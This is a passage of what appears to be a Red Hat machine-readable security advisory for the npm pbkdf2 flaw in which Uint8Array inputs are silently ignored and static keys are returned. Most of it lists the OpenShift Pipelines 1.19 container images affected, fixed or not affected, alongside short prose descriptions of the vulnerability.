"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2374378"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the npm pbkdf2 library, allowing signature spoofing. Under specific use cases, pbkdf2 may return static keys. This issue only occurs when running the library on Node.js.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "pbkdf2: pbkdf2 silently returns static keys",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is rated as an Important severity because a logic flaw was found in the npm pbkdf2 library where the vulnerability, located in the toBuffer method, causes password and salt inputs provided as Uint8Array objects to be silently ignored. This results in the function returning a static, predictable key derived from empty inputs, completely undermining the security guarantees of any feature that relies on the generated key, this allows an attacker to forge signatures, leading to a complete compromise of the application\u0027s data confidentiality, integrity, and availability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64"
],
"known_not_affected": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
